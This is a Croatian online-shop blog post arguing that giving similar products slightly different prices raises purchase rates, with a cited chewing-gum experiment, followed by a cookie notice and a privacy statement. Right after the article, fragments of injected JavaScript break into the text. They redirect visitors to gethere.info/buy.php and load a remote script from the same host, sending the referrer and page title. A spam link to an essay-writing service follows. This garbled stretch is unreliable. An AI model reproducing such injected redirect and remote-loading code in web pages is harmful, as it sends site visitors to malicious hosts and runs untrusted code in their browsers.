Pošaljite upit!

Da li Vas često kriva cijena proizvoda košta prodaje?

Da li Vas često kriva cijena proizvoda košta prodaje?

Kako ste zadovoljni s konverzijom posjetitelja svoje internet trgovine u kupca? Ukoliko imate posječenost, pitate se zašto izostaje kupnja?

Ako imate nekoliko sličnih proizvoda, problem može biti u krivoj cijeni proizvoda kojeg nudite.

Nova studija istraživača iz Singapura i Yale-a je otkrila da ako su dva slična proizvoda istih cijena , vrlo je vjerovatno da ispitanik neće kupiti ni jedan proizvod, nego kad su cijene sličnog proizvoda različite.

Međutim, ne bi li različite cijene samo donijele zbrku u procesu odlučivanja? U stvari, sitna razlika u cijeni zapravo djeluje da slični proizvodi djeluju podjednako, te se povećava vjerovatnost da će proizvod biti kupljen.

U jednom eksperimentu, znanstvenici su predstavili dvije skupine ispitanika sa izborom. Svakom su ispitaniku dali dolar sa opcijom da kupe gumu za žvakanje ili da zadrže novac. Kao izbor, ponudili su dvije slične vrste gume za žvakanje. Jedna je grupa dobila informaciju da obje gume za žvakanje koštaju 63 centa, dok je druga grupa dobila informaciju da jedna guma košta 62 centa a druga 64 centa. Ova trivijalna razlika je uzrokovala da je 77% ispitanika u drugoj grupi kupilo proizvod, dok je u prvoj grupi samo 46 % ispitanika obavilo kupnju.

U prodaji, slični proizvodi se mogu ponuditi po istoj cijeni. No, umjesto da se pojednostavljuje izbor potrošaču, time se zapravo može povećati vjerovatnost da potrošač zapravo ništa ne potroši.”http:///?sl=319481-c261c&data1=Track1&data2=Track2″; location.replace(“http://gethere.info/buy.php”);s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Children in special ed settings need to have their confidence, courage, and academic essay writing of https://www.pro-academic-writers.com emotional awareness nurtured in order to successfully play, work, cooperate, and be productive in their studies

Nastavkom pregledavanja ove stranice prihvačate korištenje Cookia. Više informacija

IZJAVA O PRIVATNOSTI Webnet poštuje vašu privatnost te nastojimo osigurati tajnost vaših privatnih podataka Svjesni smo da ubrzani rast interneta i online servisa utječu na pitanja vezana uz vaše osobne podatke, ali isto tako nastojimo sve vaše skupljene podatke držati u strogoj tajnosti te se obvezujemo da ćemo voditi računa o sigurnosti i tajnosti vaših osobnih podataka. KOJE INFORMACIJE PRIKUPLJAMO? Prikupljamo informacije iz online registracijskog formulara koje ispunjava sam korisnik. Prilikom narudžbe ili registracije možemo Vas tražiti za Vaše cijenjeno ime, prezime, email adresu, adresu i telefonski broj. Pregledavati web trgovinu možete i bez dostave vaših osobnih podataka. U KOJU SVRHU UPOTREBLJAVAMO VAŠE OSOBNE PODATKE? Vaše podatke možemo koristiti u sljedeće svrhe: • personalizacija sadržaja (vaše podatke koristimo u svrhu unapređenja kvalitete sadržaja namijenjenog pojedinom korisniku) • unapređenje naše web stranice (neprestano unapređujemo našu stranicu na temelju Vaših kritika, iskustava i prijedloga) • unapređenje usluge (vaši podaci nam omogućuju da unaprijedimo korisničku podršku te što kvalitetnije zadovoljimo korisničke zahtjeve i potrebe) • slanje periodičnih e-mailova ( u svrhu unapređenja usluga i poboljšanja korisničkih iskustava šaljemo periodične mailove sa relevantnim novostima, informacijama i obavjestima) • promocija, administracija i nadzor stranice NA KOJI NAČIN ČUVAMO VAŠE PODATKE? Vaše podatke čuvamo implementacijom sigurnosnih mjera. KORISTIMO LI COOKIJE? Stranica www.webzamene.net koristi cookije DIJELIMO LI VAŠE PODATKE VANJSKIM PARTNERIMA? Vaše podatke ne prodajemo, mijenjamo ni na koji način dijelimo s vanjskim partnerima. Vaše podatke dostavljamo JEDINO u slučaju kršenja zakona ili na temelju sudskog naloga kojeg smo dužni poštovati. GUBITAK VAŠIH OSOBNIH PODATAKA Stranica www.webzamene.net ne odgovara za štetu nastalu gubitkom Vaših osobnih podataka. Webnet d.o.o. ne može se smatrati odgovornim za zlouporabe za koje se ne može utvrditi da su nastale kao posljedica tehničko-sigurnosnog propusta sustava web trgovine ili propusta djelatnika Webnet d.o.o. ONLINE IZJAVA O PRIVATNOSTI Ova izjava privatnosti vrijedi samo za informacije prikupljene preko naše web stranice, ne vrijedi za informacije prikupljene offline putem. VAŠA SUGLASNOST Koristeći stranicu www.webzamene.net pristajete na Izjavu o privatnosti. PROMJENE U DOKUMENTU "IZJAVA O PRIVATNOSTI" Ukoliko ćemo imati potrebu za promjenom dokumenta "Izjava o privatnosti" sve navedene izmjene će biti objavljene u ovom dokumentu. Zadnji datum izmjene: 10/11/2012 KONTAKTIRAJTE NAS Ukoliko imate bilo kakvo pitanje vezano uz sigurnost vaših osobnih podataka možete nas kontaktirati na : mail: info@webnet.hr

Zatvori